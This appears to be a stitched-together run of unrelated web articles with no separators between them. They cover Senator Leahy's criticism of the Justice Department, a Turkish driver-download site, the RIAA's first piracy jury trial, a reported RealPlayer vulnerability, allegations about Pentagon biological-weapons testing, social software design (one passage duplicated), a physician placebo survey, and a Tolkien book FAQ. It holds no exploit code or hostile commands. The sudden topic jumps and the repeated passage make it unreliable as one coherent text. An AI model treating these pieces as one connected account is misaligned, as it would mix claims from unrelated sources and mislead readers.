" The Attorney General who recently resigned apparently believed that the President has a commander - in - chief override of the laws of this country , which contributed to his violations of the Foreign Intelligence Surveillance Act ( FISA ) , his signing statement reservations , and other overreachings , " Leahy wrote .
Leahy placed the blame for the ongoing controversies squarely on the White House , accusing the administration of deliberately stonewalling his committee 's search for information .
" With so much to do and so much damage that needs to be repaired , I had hoped that the White House would have taken advantage of the time since the resignations of Mr. Gonzales and Mr. Rove to work with us to fulfill longstanding requests for information so that we could all agree about what went so wrong at the Department of Justice and work together to restore it , " Leahy wrote .
" Instead , they have left you to answer the unanswered questions and left longstanding disputes unresolved . "
Driverlar genelde her kişinin sorunu olmuştur .
bazen çok eski bir bilgisayara format attıktan sonra aramaya başlarız , bazende vista olarak ald ığımız bilgisayaramıza xp kurmak için çabalar dururuz .
driverara.com sitesi ise bizim işimizi azda olsa kolaylaştırmış .
Umarım ilerde daha büyük bir arşiv ile karşılar bizi .
Driver İndir yaz ısında telif haklarına ve yasalara aykırı bir bilgi veya link bulunuyorsa lütfen yaz ısında telif haklarına ve yasalara aykırı bir bilgi veya link bulunuyorsa lütfen buradan iletişime geçiniz .
DULUTH , Minnesota —
The Recording Industry Association of America ’s first piracy trial went before a jury here Tuesday , with the industry ’s attorney urging panelists " to hold the defendant responsible for her actions . "
Attorney Richard Gabriel , addressing 12 jurors in a dimly lit cement - block courtroom , said , " The record companies are made up of real people . "
The Copyright Act case is the first of over 20,000 the labels have lodged across the nation to go before a jury .
Many have settled , have been dismissed or are pending since the RIAA launched it ’s zero - tolerance piracy litigation campaign four years ago .
It ’s a cloudy , balmy day here .
The gallery is filled with about two dozen onlookers , many of them journalists , students and lawyers watching a case that could set precedent on the evidence required for jurors to find somebody liable of copyright infringement over the internet .
Defendant Jammie Thomas , a 30 - year - old single mother of two who works at a nearby Indian reservation , could be forced to pay nearly $ 4 million in damages .
She ’s accused of unlawfully uploading 25 copyrighted works from some of the biggest names in the industry .
Her defense is simple :
She did n’t do it and the industry must prove she was behind the internet protocol ( IP ) address the RIAA says was used to share 1,700 songs on the file - sharing site Kazaa in 2005 .
" The plaintiffs do n’t have the evidence that she downloaded anything , " Thomas ’ attorney , Brian Toder told jurors .
" The best that they can come up with is somebody out there in cyberland … offered on Kazaa some copyrighted material . "
The industry in this case is only suing over 25 songs , with damages up to $ 150,000 per violation , because it does n’t want to exact too big of financial penalties by going for all 1,700 , testified Jennifer Pariser , Sony BMG ’s anti-piracy chief .
" The damages would be substantial , " she said .
" We have no intent in pursing cases like that . "
U.S. District Judge Michael Davis is quickly moving the case along .
Twelve jurors , six men and six women , were chosen in about 70 minutes early Tuesday .
Pariser , the first witness , was immediately called after lawyers gave their brief , opening arguments .
During jury selection , panelists did not appear computer savvy .
Five of them have a digital music player and only three knew where they got the music for it — from iTunes .
One juror , a construction foreman , said he had never been on the internet .
One juror was excused who said she had used a peer - to - peer site to download copyrighted music .
Testimony , including from the defendant , former RIAA executive Cary Sherman and other industry insiders is expected to last through the week .
Pariser testified that hijacked music and purchased music sound the same , at least with the recordings in question .
She played for jurors about 30 seconds of Journey ’s " Do n’t Stop Believing . "
Not surprisingly , both versions of the Sony - copyrighted tune — the purchased one , and the downloaded copy –sounded the same .
Pariser , in the witness stand , briefly weaved back and forth to the melody , while the gallery and jury box sat stone faced .
There were originally 26 songs at issue .
But recording - company Virgin Records withdrew Janet Jackson ’s " Back " from the lawsuit .
Other songs at issue include Guns N Roses ’ " Welcome to the Jungle " , Vanessa Williams ’ " Save the Best for Last , " and Janet Jackson ’s " Let ’s Wait a While . "
Remaining plaintiffs , who are RIAA members , include : Capitol Records , Sony BMG , Arista Records , Interscope Records , Warner Bros. Records and UMG Recordings .
—
Image :
In this courtroom sketch , recording industry attorney Richard Gabriel ( left ) is shown with a pool of potential jurors in Tuesday morning ’s jury selection .
Six men and six women were impaneled .
( Wired News / Cate Whittemore )
Security watchers warn that an unpatched vulnerability in RealPlayer poses a severe risk .
A flaw in RealPlayer 11 build 6.0.14.748 might be used to inject hostile code onto Windows boxes running the software , security notification firm Secunia warns .
Other versions of the media player software may also be vulnerable .
The vulnerability stems from a stack overflow bug in RealPlayer 11 discovered by Russian security firm Gleg .
The firm discovered the flaw during an audit of RealPlayer 's source code .
Gleg has not released technical details of the flaw , pending the release of a patch , but it has posted a flash demo of the vulnerability here .
Security clearing house US CERT issued an advisory warning of heightened risk stemming from the flaw following the publication of a proof of concept exploit .
RealNetworks is investigating the flaw , SC Magazine adds .
The developer criticised Gleg for posting the proof of concept exploit without giving it a chance to fix the bug first .
Users of the popular media player are advised to be careful about opening untrusted media files , particularly those found on untrusted websites , to minimise the risk of finding their systems owned as a result of the flaw . ®
Pentagon Poised To Resume Open Air Weapons Testing
Pentagon Appears Poised To Resume Open - Air Testing Of Biological Weapons But Says It Has Received No Presidential Directive To Break Moratorium
By Sherwood Ross
The Pentagon has denied President Bush issued a directive for it to resume open - air testing of chemical and biological warfare ( CBW ) agents that were halted by President Richard Nixon in 1969 .
Yet , the Pentagon 's stated preparations make it appear it is poised to do just that .
Spokesperson Chris Isleib did not respond to a request for comment on a passage from the Defense Department 's annual report sent to Congress last April that suggests the Pentagon is gearing up to resume the tests .
Resumption of open - air testing would reverse a long - standing moratorium adopted after a public outcry against them following accidents in the Sixties .
The Pentagon 's annual report apparently calls for both the developmental and operational " field testing of ( CBW ) full systems , " not just simulations .
The Pentagon 's report to Congress contains the following passage : " More than thirty years have passed since outdoor live - agent chemical tests were banned in the United States , and the last outdoor test with live chemical agent was performed , so much of the infrastructure for the field testing of chemical detectors no longer exists or is seriously outdated .
The currently budgeted improvements in the T&E infrastructure will greatly enhance both the developmental and operational field testing of full systems , with better simulated representation of threats and characterization of system response . "
" T&E " is an acronym for testing and evaluation .
" Either the military has resumed open - air testing already or they are preparing to do so , " said Francis Boyle , a University of Illinois Professor of International Law who authored the implementing legislation for the U.S. Biological Weapons Convention signed into law by President George Bush Sr. and who has tracked subsequent developments closely .
" I am stunned by the nature of this development , " Boyle said .
" This is a major reversal of policy . "
The 1972 treaty against germ warfare , which the U.S. signed , forbids developing weapons that spread disease , such as anthrax , a pathogen that is regarded by the military as " ideal " for conducting germ warfare .
" The Pentagon is fully prepared to launch biological warfare by means of anthrax , " Boyle charged .
" All the equipment has been acquired and all the training conducted and most combat - ready members of U.S. armed forces have been given protective equipment and vaccines that allegedly would protect them from that agent . "
Open -air testing takes research into deadly agents out of the laboratories in order to study their effectiveness , including their aerial dispersion patterns , and whether they actually infect and kill in field trials .
Since the anthrax attacks on Congress in October , 2001 , the Bush administration has funded a vast biological research expansion at hundreds of private and university laboratories in the U.S. and abroad involving anthrax and other deadly pathogens .
The anthrax attacks killed five people , including two postal workers , injured 17 others and temporarily shut down the operations of the U.S. Congress , Supreme Court , and other Federal entities .
Although a Federal statute permits the president to authorize open - air testing of CBW agents , Boyle said this " does not solve the compliance problem that it might violate the international Chemical Weapons Convention and the Biological Weapons Convention as well as their related domestic implementing legislation making such violations crimes . "
Boyle charged the U.S. is already " in breach " of both conventions and also of U.S. domestic criminal law implementing them .
In February , 2003 , for example , the U.S. granted itself a patent on an illegal , long - range biological - weapons grenade , evidently for offensive purposes .
Boyle said the development of anthrax for possible offensive purposes is underscored by the government 's efforts " to try to stockpile anthrax vaccines and antibiotics for 25 - million plus Americans to protect the civilian population in the event there is any ' blowback ' from the use of anthrax in biowarfare abroad by the Pentagon . "
" In theory , " Boyle added , " you cannot wage biowarfare abroad unless you can protect your civilian population from either retaliation in kind , or blowback , or both . "
Under Project BioShield , Homeland Security is spending $ 5.6 billion to stockpile vaccines and drugs to fight anthrax , smallpox , and other bioterror agents .
The project had been marked by delays and operational problems and on December 12th last year Congress passed legislation to pump another $ 1 billion into BioShield to fund three years of additional research by the private sector .
Boyle said evidence the U.S. has super - weapons - grade anthrax was demonstrated in the October , 2001 , anthrax mail attacks on Senators Thomas Daschle ( D - S.D. ) and Patrick Leahy ( D - Vt . )
The strain of highly sophisticated anthrax employed has allegedly been traced back to the primary U.S. Army biological warfare campus at Ft. Detrick , Md . The attacks killed five persons and sickened 17 others .
A current effort to expand Ft. Detrick has sparked widespread community opposition , according to a report in the Baltimore Sun .
" Obviously , someone working for the United States government has a stockpile of super - weapons grade anthrax that can be used again domestically for the purposes of political terrorism or abroad to wage offensive warfare , " Boyle said .
The Associated Press has reported the U.S. Army is replacing its Military Institute of Infectious Diseases at Ft. Detrick " with a new laboratory that would be a component of a biodefense campus operated by several agencies . "
The Army told AP the laboratory is intended to continue research solely for defense against biological threats .
Undercutting the argument U.S. research is for " defensive " purposes is the fact government scientists have been creating new strains of pathogens for which there is no known cure .
Richard Novick , a professor of microbiology at New York University , has stated , " I cannot envision any imaginable justification for changing the antigenicity of anthrax as a defensive measure . "
Changing a pathogen 's antigenicity means altering its basic structure so that existing vaccines will prove ineffective against it .
Biological warfare involves the use of living organisms for military purposes .
Such weapons can be viral , bacterial , and fungal , among other forms , and can be spread over a large geographic terrain by wind , water , insect , animal , or human transmission , according to Jeremy Rifkin , author of " The Biotech Century " ( Penguin ) .
Boyle said the Federal government has been plowing money into upgrading Ft. Detrick , Md. , and other CBW facilities where such pathogens are studied , developed , tested , and stored .
By some estimates , the U.S. since 2002 has invested some $ 43 billion in hundreds of government , commercial , and university laboratories in the U.S. for the study of pathogens that might be used for biological warfare .
According to Rutgers University molecular biologist Richard Ebright , more than 300 scientific institutions and 12,000 individuals have access to pathogens suitable for biowarfare and terrorism .
Ebright found that the Number of National Institute of Health grants to research infectious diseases with biowarfare potential shot up from 33 in the 1995 - 2000 period to 497 by 2006 .
Ebright has stated the government 's tenfold expansion of Biosafety Level - 4 laboratories , such as those at Fort Detrick , raises the risk of accidents and the diversion of dangerous organisms .
" If a worker in one of these facilities removes a single viral particle or a single cell , which cannot be detected or prevented , that single particle or cell can form the basis of an outbreak . "
During the Cold War era , notably in the Fifties and Sixties , various Government agencies engaged in open - air CBW testing on U.S. soil and on naval vessels at sea to study the effects of weaponized pathogens .
U.S. cities , including New York , Chicago , and San Francisco , were among the targets and sickness and even a number of deaths were reported as a result .
According to an article titled " Lethal Breeze " by Lee Davidson in the Deseret News of Salt Lake City of June 5 , 1994 , " In decades of secret chemical arms tests , the Army released into Utah winds more than a half million pounds of deadly nerve agents . "
Among them , he said , was VX , a pinhead - sized drop of which can be lethal .
The tests were conducted at Dugway Proving Ground but Davidson said the evidence suggests " some ( agents ) may have escaped with the wind . "
Pentagon documents obtained by the News listed 1,635 field trials or demonstrations with nerve agents VX , GA and GB between 1951 and 1969 , " when the Army discontinued use of actual nerve agents in open - air tests after escaped nerve gas apparently killed 6,000 sheep in Skull Valley , " Davidson wrote .
The Skull Valley strike also sickened a rancher and members of his family .
Boyle has previously charged the Pentagon with " gearing up to fight and ' win ' biological warfare " pursuant to two Bush national strategy directives adopted in 2002 " without public knowledge and review . "
He contends the Pentagon 's Chemical and Biological Defense program was revised in 2003 to implement those directives , endorsing " first-use " strike of chemical and biological weapons in war .
The implementing legislation Boyle wrote that was enacted unanimously by Congress was known as the Biological Weapons Anti-Terrorism Act of 1989 .
Boyle has written extensively on the subject .
Among his published works are " Biowarfare and Terrorism " and " Destroying World Order : U.S. Imperialism
In the Middle East Before and After September 11th , " both from Clarity Press .
*************
( Sherwood Ross is a free - lance writer and public relations consultant and Director of Anti-War News Service .
He was host of a radio talk show in Washington , D.C. , reported for the Chicago Daily News and worked as a regular columnist for several wire services .
Reach him at sherwoodr1@yahoo.com )
© Scoop Media
The future of your social software is already here
“ The future is already here – it is just unevenly distributed . ” .
This quote by William Gibson ( often reprised by Tim O’Reilly ) is bantered about in tech circles whenever people get the feeling they ’re glimpsing the future .
It was particularly appropriate for the iPhone launch last June , when countless people pointed out that the touch - screen has been around for a long time .
The quote also pertains to web application design and the research teams need to do in order to make great software .
In a talk I gave the other day on social design , I went on at length about how you need to design for personal value before social value .
( I ’ve long called this the Del.icio.us Lesson ) .
I illustrated how most successful social web applications provide personal value at their most basic , using social value to augment it and make it better .
So YouTube is a great video storage application first … and it also has great sharing features if you choose to do that .
( As a counter - example consider Technorati Tags , which provide social value but do n’t provide personal value .
One word : SPAM )
A software designer from the audience asked the next logical question ( a question I get a lot ! ) …
“ The future is already here – it is just unevenly distributed . ” .
This quote by William Gibson ( often reprised by Tim O’Reilly ) is bantered about in tech circles whenever people get the feeling they ’re glimpsing the future .
It was particularly appropriate for the iPhone launch last June , when countless people pointed out that the touch - screen has been around for a long time .
The quote also pertains to web application design and the research teams need to do in order to make great software .
In a talk I gave the other day on social design , I went on at length about how you need to design for personal value before social value .
( I ’ve long called this the Del.icio.us Lesson ) .
I illustrated how most successful social web applications provide personal value at their most basic , using social value to augment it and make it better .
So YouTube is a great video storage application first … and it also has great sharing features if you choose to do that .
( As a counter - example consider Technorati Tags , which provide social value but do n’t provide personal value .
One word : SPAM )
A software designer from the audience asked the next logical question ( a question I get a lot ! )
“ How do you proceed if you ’re considering adding social features to your application but are n’t sure whether or not they provide real personal value ? ”
The answer is that you have to find out if the problem you ’re trying to solve already exists .
If , as Gibson might say , it ’s here but just not distributed yet .
If it is here , then it follows that people are already dealing with it somewhere , somehow .
They might not even be using software to deal with it , but they ’re struggling nevertheless .
The trick is to find out where and how this happens .
( do n’t be afraid of Do It Yourself research )
The iPhone , of course , is n’t as revolutionary as it is evolutionary .
In fact , the problems of mobile phones were quite well understood by everyone who used them .
The situation was simply that we were putting up with them .
The most successful software does n’t solve problems that do n’t exist yet .
The most successful software solves problems that nobody else is trying to solve , or nobody else is trying to solve in the same way .
If you cannot find any evidence that the problem your new feature is trying to solve is indeed an existing problem people are already dealing with , then I would seriously reconsider building it .
A survey of doctors practising in Chicago , USA , found that forty five per cent of them recommended placebos to patients in clinical practice and believed in the mind - body connection .
The study is published in the January issue of the Journal of General Internal Medicine and is the work of Rachel Sherman , a 4th year medical student at the University of Chicago ’s Pritzker School of Medicine , and Dr John Hickner , a professor of family medicine , at the University of Chicago and University of Chicago Medical Center .
The placebo is often investigated in clinical trial research , but there is little evidence of its effectiveness and use in day to day health care practice .
The researchers wanted to find out how doctors used placebos and what knowledge , attitudes and beliefs about placebos influenced their practice .
Sherman and Hickner invited doctors from internal medicine departments in 3 medical schools in the Chicago area to complete an anonymous web based survey of 16 questions .
The results showed that :
50 per cent of the 466 invited participants responded ( 231 out of 466 ) .
45 per cent of respondents reported using a placebo in clinical practice .
Of these , 34 per cent introduced the placebo to the patient as “ a substance that may help and will not hurt ” , 19 per cent said “ it is medication ” , and 9 per cent said “ it is medicine with no specific effect ” .
Only 4 per cent of those who used placebo told the patient “ it is a placebo ” .
The most common reasons for using a placebo were to calm the patient and to supplement another treatment .
There was much disagreement on the definition of placebo and how it works .
96 per cent of respondents believed placebos have therapeutic effects .
40 per cent of respondents said placebos can have physiological benefits for certain health problems .
12 per cent of respondents said placebos should be categorically prohibited in routine medical care .
48 per cent of respondents reported giving at least one type of placebo - like treatment where there was no clinical evidence to support it .
The most common definition chosen by respondents was that a placebo was “ an intervention not expected to have an effect through a known or specific physiologic mechanism ” .
The respondents were also asked if they thought there might be psychological or physiological benefits to yoga , meditation , relaxation , biofeedback , prayer , social support , doctor - patient rapport , and the interior design of the healthcare facility .
In most cases the majority of respondents reported they believed there were both psychological and physiological benefits .
Sherman and Hickner concluded that :
“ Nearly half of the respondents use placebos in clinical practice and most believe in the mind - body connection . ”
They cautioned that the study was limited by the fact it was based on retrospective self - reported behavior , and the results were subject to recall bias and may not be representative of all American doctors .
Sherman said :
“ Placebos have been used in medicine since ancient times , and remain both clinically relevant and philosophically interesting .
In addition to their recognized use as controls in clinical trials , this study suggests that placebos themselves are viewed as therapeutic tools in medical practice . ”
In their paper , the authors mentioned literature that suggests the routine use of placebos is controversial .
Some writes on informed consent and non-deceptive therapies urge medical professionals to be cautious about using placebos , while others say it is possible to use them in some cases without causing ethical problems .
Sherman and Hickner suggested there is a growing body of medical professionals who believe in the mind body connection , where how and what a person thinks can impact their health and body state .
Decades ago , they wrote , doctors used to give placebos to patients who were faking symptoms , but today , as their survey showed , it appears that the vast majority of doctors believed placebos can have a therapeutic effect .
Sherman and Hickner said their study pointed to a need for greater recognition in the medical profession about the use of placebos and unproven therapies .
The implications of such practice should be discussed , they urged .
“ Academic Physicians Use Placebos in Clinical Practice and Believe in the Mind - Body Connection . ”
Rachel Sherman and John Hickner .
Journal of General Internal Medicine , Volume 23 , Number 1 , January , 2008
DOI : 10.1007/s11606-007-0332-z
Click here for Abstract .
Sources : University of Chicago Medical Centre press release , journal abstract .
Written by : Catharine Paddock
The Children of Hurin - FAQ ( 18.02.07 )
It seems a lot of people do ask me the same questions over and over again .
All are very excited about the new Tolkien book and all want to know so many things about it !
So I send some questions to HarperCollins and made it into THE CHILDREN OF HURIN FAQ .
Once I will have more frequently asked questions , i'll try and get an answer from HarperCollins and make this Faq even bigger .
Q : How did The Children of Húrin come about ?
The Children of Húrin , begun in 1918 , was one of three ‘ Great Tales ’ J.R.R .
Tolkien worked on throughout his life , though he never realised his ambition to see it published in his lifetime .
Some of the text will be familiar to fans from extracts and references within other Tolkien books but this is the first time the entire story has been presented in its complete form .
As Adam Tolkien elaborated in a recent interview : ‘ This is a more difficult question than it seems :
As you know , versions and pieces of the story of Húrin and his descendants have been published in various works ( The Silmarillion , Unfinished Tales , The Book of Lost Tales , The Lays of Beleriand , etc ) .
The text of The Children of Húrin is in part compiled from these extant texts , and particularly that which appears in Unfinished Tales .
‘ But it is a new reworking of the complete story .
Many parts of the text will be – if not identical – recognizable to the knowledgeable reader , but there are also pieces that have never appeared before .
Also the format of the text , as a standalone and complete text with no editorial commentary to interrupt the tale , should in itself and in my opinion considerably transform the reading experience .
‘ The text as a whole can be said to be “ new ” as it is a recomposition of published texts and other “ pieces ” that were n’t published previously .
The completed puzzle , in a sense . ’
Q : What is Christopher ’s contribution to the book ?
Christopher Tolkien has painstakingly edited together the complete work from his father ’s many drafts , and this book is the culmination of a tireless thirty - year endeavour by him to bring J.R.R .
Tolkien ’s vast body of unpublished work to a wide audience .
Christopher Tolkien says : “ It has seemed to me for a long time that there was a good case for presenting my father ’s long version of the legend of The Children of Húrin as an independent work , between its own covers , with a minimum of editorial presence , and above all in continuous narrative without gaps or interruptions , if this could be done without distortion or invention , despite the unfinished state in which he left some parts of it . ”
Having drawn the distinctive maps for The Lord of the Rings more than 50 years ago , Christopher has also created a detailed new map for this book .
Adam continues : ‘ The text of The Children of Húrin is entirely in the author ’s ( so J.R.R. Tolkien ’s ) words – apart from very minor reworkings of a grammatical and stylistic nature .
Christopher ’s work has been to produce a text that is a faithful rendition of his father ’s writings – using many sources spaced out over decades . ’
Q : What is Alan Lee ’s involvement in the book ?
In addition to the text The Children of Hurin will include a jacket , colour paintings and pencil drawings by Alan Lee , illustrator of The Hobbit and The Lord of the Rings Centenary Edition and Oscar® - winning designer of the film trilogy .
The eight paintings , together with the dramatic front cover illustration and 25 drawings , have been a real labour of love for the artist .
He says of his work , ‘ It is always a privilege being asked to illustrate the work of such a distinguished and well - loved author .
I had already worked on illustrations for editions of The Hobbit and The Lord of The Rings for HarperCollins so was familiar with the particular challenge of interpreting the characters and places unique to Tolkien .
Illustrating The Children of Húrin was quite a responsibility but I hope that I have produced artwork that will successfully complement this wonderful tale for the reader . ’
Q : Can you show me one of the illustrations by Alan Lee ?
Here is Alan Lee 's painting " Beleg Departs Menegroth " from The Children of Hurin , opposite page 96 .
It is the first interior painting released by HarperCollins .
Q : Can you show me the trailer that was made for the release of this book ?
I received this trailer from the US publisher Houghton Mifflin , you can go and see the UK trailer at tolkien .
co.uk .
Q : What is the story of The Children of Hurin about ?
Also called " The Tale of Grief " , " Narn i Chîn Húrin " , commonly called " The Narn " , tells of the tragic fates of the children of Húrin , his son Turin ( Turambar ) and his daughter Nienor .
[ SPOILER ]
For those who want to know even more about the tale I will give a brief summary and give a guide how to read the story ( if you cannot wait for the new completed version of The Narn ) .
The story starts ( in the published Silmarillion ) with the childhood of Túrin , continuing through the captivity of his father in the Nirnaeth Arnoediad , and Túrin 's exile in Doriath , to Túrin 's time in Nargothrond , his unintentionally incestuous relationship with his sister Nienor , and ultimately ending with suicide by his sword Gurthang after having slain Glaurung .
As a point of reference regarding the names of the main characters :
In this story , Túrin renames himself Turambar , meaning Master of Doom in the High - Elven speech , with a vow to turn aside from the darkness that had ruled his early life .
His sister Nienor is also called Níniel , meaning Maid of Tears .
She is renamed by Turambar himself after he finds her alone and in distress in the woods .
Only much later does he learn her real name and origins .
The section ends with the Elves calling them by the names of Túrin Turambar Dagnir Glaurunga ( as the slayer of the Dragon Glaurung ) and Nienor Níniel .
The story of the Narn continues in the Later Narn ( which you can read in the Unfinished Tales ) .
The last part of the story ( published as " the Wanderings of Húrin " ) , a text which was found to be too different in style from the rest of the Silmarillion , but which continues the Narn past Túrin 's death and ends with Húrin 's eventual release and the bad deeds which come from that ( read in The War of the Jewels , part 11 of the History of Middle - earth series ) .
Q : Have excerpts of teh Children of Hurin been published before ?
Of course excerpts of The Children of Húrin have been published before , namely in The Silmarillion ( prose ) , Unfinished Tales ( prose ) , in The Book of Lost Tales partII ( prose ) , in The Lays of Beleriand ( verse in allitterative long - lines ) and the most recent in 1994 in The War of the Jewels ( prose ) , but this part will not be inside the new " The Children of Hurin " .
In the body of The Silmarillion , we find it as the second of the three tales which Tolkien wrote in succession while on medical leave from the British army during 1917 through the spring of 1918 : " Of Beren and Luthien " , " Of Turin Turambar " , and " Of Tuor and the Fall of Gondolin " .
In Unfinished Tales we have a detailed , though unfinished and , in parts , interrupted narrative version of the poetic tale about the Children of Húrin told once long ago by the poet Dírhavel and called " Narn i Hîn Húrin " - Sindarin for " The Lay of the Children of Húrin " .
The present narrative is the Tolkien father and son tandem 's version of the story .
In 1984 we find excerpts in The Book of Lost Tales Part II , the second volume of The History of Middle - earth as " Turambar and the Foalókë " and " The Nauglafring " .
The Lays of Beleriand , the third volume of The History of Middle - earth , consists of two extensive poems by J.R.R. Tolkien having to do with the Eldar Days .
They are the Lay of the Children of Húrin and the Lay of Leithian .
The first of the poems " the Lay of the Children of Húrin " , his early but most sustained work in the ancient English meter , intended to narrate on a grand scale the tragedy of Turin Turambar .
More on Húrin can be found in The War of the Jewels , the eleventh volume of The History of Middle - earth series , published in 1994 , in " The Wanderings of Húrin " .
These additional narratives involving Húrin and the tragedy of his children , " The Wanderings of Húrin " is the conclusion to the " Narn " .
It was not included in the final Silmarillion because Christopher Tolkien feared that the heavy compression which would have been necessary to make it a stylistic match with the rest of the book would have been too difficult and would have made the story overly complex and difficult to read .
These will for the same reason not be included in " the Children of Hurin " .
The Tale about the Children of Húrin comes from the ancient times of the First Age and is a beautiful and touching story about the tragic fate of Húrin 's family from the house of Hador Goldenhead " the Lord of the Edain " .
Húrin was the Man who dared directly defy Melkor and was cruelly punished for this by the mighty Vala .
It tells the account of the killing by Turin of his friend Beleg , as well as a unique description of the great redoubt of Nargothrond .
Q : What formats will The Children of Húrin be available in ?
The Children of Húrin will be simultaneously published in two editions – a standard hardback edition at £ 18.99 ( ISBN 0-00-724622-6 ) and a de luxe slipcased edition at £ 60.00 ( ISBN 0-00-725223-4 ) .
Q : What will be included in the hardback book ?
The book will include the first standalone tale of Middle - earth since 1977 – the complete version of Tolkien ’s most dramatic tale :
- A specially written introduction by J.R.R. Tolkien ’s son Christopher
- Appendices on the history of the tale also written by Christopher Tolkien
- Exclusive new two - colour fold - out map of Beleriand and the lands to the north
- More than 30 new paintings and drawings by award - winning illustrator Alan Lee
- Three genealogical tables specially drawn by Christopher Tolkien for this new work
Q : What will be the table of contents for the children of Hurin ?
Contents data are machine generated based on pre-publication provided by the publisher and info was recovered from the Library of Congress .
Contents may have variations from the printed book or be incomplete .
This table of content comes from The Children of Hurin first proofs ( 10/1/07 16:15 ) of the Houghton Mifflin Edition .
CONTENTS
Preface 7
Introduction 13
Note on Pronunciation 28
NARN I CHIN HURIN 31
The Tale of the Children of Húrin
I The Childhood of Húrin 33
II The Battle of Unnumbered Tears 52
III The words of Húrin and Morgoth 61
IV The Departure of Túrin 66
V Túrin in Doriath 80
VI Túrin among the Outlaws 98
VII Of Mîm the Dwarf 121
VIII The Land of Bow and Helm 141
IX The Death of Beleg 151
X Túrin in Nargothrond 159
XI The Fall of Nargothrond 171
XII The Return of Túrin to Dor-lómin 182
XIII The Coming of Túrin into Brethil 192
XIV The Journey of Morwen and Niënor to Nargothrond 198
XV Niënor in Brethil 213
XVI The Coming of Glaurung 221
XVII The Death of Glaurung 234
XVIII The Death of Túrin 248
TABLES 261
Genealogies :
I The House of Hador & the people of Haleth 262
II The House of Bëor 263
III The princes of the Noldor 264
APPENDIX 265
(1) The Evolution of the Great Tales 267
(2) The Composition of the Text 281
LIST OF NAMES 291
Note on the map 319
Q : What will the hardback book look like ?
On the cover we see Gorthol , the Dread Helm , as we can read in the Quenta Silmarillion ( XXI:40 ) :
" For Túrin put on again the Helm of Hador ; and far and wide in Beleriand the whisper went , under wood and over stream and through the passes of the hills , saying that the Helm and Bow that had fallen in Dimbar had arisen again beyond hope . (...)
And Túrin named himself anew , Gorthol , the Dread Helm , and his heart was high again .
In Menegroth , and in the deep halls of Nargothrond , and even in the hidden realm of Gondolin , the fame of the deeds of the Two Captains was heard ; and in Angband also they were known .
Then Morgoth laughed , for now by the Dragon - helm was Húrin 's son revealed to him again ; and ere long Amon Rûdh was ringed with spies . " .
Q : What will be in the de luxe edition ?
The de luxe edition will be housed in a custom - built slipcase ; it will include the cover painting as an exclusive frontispiece ; be decorated with a unique foiled motif created specially by Alan Lee for this edition ; include a silk ribbon marker ; and will be produced using superior materials and binding .
It will be the perfect companion to de luxe editions of The Hobbit and The Lord of the Rings .
It is being published alongside The Children of Húrin hardback in April 2007 .
Both HarperCollins ( UK ) and Houghton Mifflin ( US ) have released images of how the Deluxe Editions will look like .
Probably both are still not the final image yet it gives a nice preview of what we can expect .
At this time there are no plans for there to be a signed edition .
In september 2007 there will be published a large type edition .
Q : Where can I buy the books from ?
The best place to order the book prior to the publication date is Amazon.co.uk .
Here is the link :
Publication Date : 16/04/2007 ( UK )
Price : £ 18.99 ( UK )
Binding : Hardback
Format : 5.9 x 9 inches
ISBN - 10 : 0007246226
ISBN - 13 : 978-0007246229
Estimate : pages
Imprint : HarperCollins
Rights : OM
Division : HarperEntertainment .
Publication Date : 16/04/2007 ( UK )
Price : £ 60 ( UK )
Binding : Hardback , De Luxe Edition
Format : 222x143mm
ISBN - 10 : 0007252234
ISBN - 13 : 978-0007252237
Estimate : 320 pages
Imprint : HarperCollins
Rights : OM
Division : HarperEntertainment .
Publication Date : 03/09/2007 ( UK )
Price : £ 20 ( UK )
Binding : Hardback , Large type e. edition
Format : not known yet
ISBN - 10 : 0007252250
ISBN - 13 : 978-0007252251
Estimate : 320 pages
Imprint : HarperCollins
Rights : OM
Division : HarperEntertainment .
From the 17th April the book will be available in all good bookstores , including Waterstones , Borders and WHSmith .
Q. Will there be a US version of the book ?
Here is the info about the hardback and the deluxe edition of The Children of Hurin by Houghton Mifflin :
Publication Date : April 17 , 2007 ( US )
Price : $ 26 ( US )
Binding : Hardback
ISBN - 10 : 0618894640
ISBN - 13 : 978-0618894642
Estimate : 320 pages
Imprint : Houghton Mifflin
Publication Date : April 17 , 2007 ( US )
Price : $ 75 ( US )
Binding : Hardback , De Luxe Edition
ISBN - 10 : 0618904417
ISBN - 13 : 978-0618904419
Estimate : 320 pages
Imprint : Houghton Mifflin
Q : How will the Tolkien Calendar 2008 and Tolkien Diary 2008 look like ?
The official Tolkien calendar , this year containing 12 of the finest watercolours by Alan Lee , selected from ‘ The Children of Hurin ’ by J.R.R .
Tolkien and other works illustrated by Alan , and accompanied by numerous pencil sketches , many unique to this calendar .
• Features 12 delightful new paintings & illustrations by the acclaimed and Oscar - winning artist
• All scenes in this year ’s calendar come from ‘ The Children of Hurin ’ , the newly completed tale of Middle - earth by J.R.R.
Tolkien
• Contains material exclusive to this edition
The annual Tolkien diary , this year contains a haunting collection of watercolours and pencil
sketches by acclaimed and Oscar - winning Tolkien artist , Alan Lee , from the newly published ‘ The Children of Hurin ’ , J.R.R .
Tolkien ’s epic tale of adventure set in Middle - earth .
• Features 13 delightful new paintings & numerous illustrations by the acclaimed and Oscar - winning artist .
• All scenes in this year ’s diary come from The Children of Hurin , the newly completed tale of Middle - earth by J.R.R. Tolkien .
• Contains material exclusive to this edition .
More info can be found here .
Q : When will the new website be up and running ?
We are currently working on redesigning the Tolkien website www.tolkien.co.uk and we are aiming to have the new site live at the beginning of March 2007 .
If you would like to receive further information and be kept up to date with news about the impending book launch then please visit the site from March and register your details .
Q : Will Christopher
Tolkien be doing any signings ?
Christopher Tolkien will regrettably be unavailable to attend any signing events .
However , Alan Lee will be signing copies of the book in the UK and further details of these events will be available here .
Q : Will there be any life event for the release ?
The Children of Húrin Release Party is an online event which will take place around the release date of The Children of Húrin , the new book by J.R.R.
Tolkien , due for worldwide release on Tuesday 17th April 2007 .
The release party will take place online at irc.tolkiengateway.net for three days in a row on April 15th , 16th and 17th 2007 , and is being organized by TolkienLibrary.com and TolkienGateway.net .
There will be an after party on April 18th .
Next to chatting there will be numerous games , competitions , giveaways and Q&A ’s with special guests like David Brawn , James Dunning , Jeff Murray , Johan Vanhecke , Mark T. Hooker , Matt Blessing , Michael Drout , Michaël Duveaux , Nils Ivar Agøy , Roger Garland , Verlyn Flieger , ...
Q : Will any review copies be available in advance of the publication date ?
No review copies are being sent out as we want fans to read the book when it is published and not have had their reading enjoyment spoiled by details of the story being revealed in early reviews .
Enjoyed this post ?
Click to get future articles delivered by email or get the RSS feed .
Spread the news about this J.R.R.
Tolkien article :
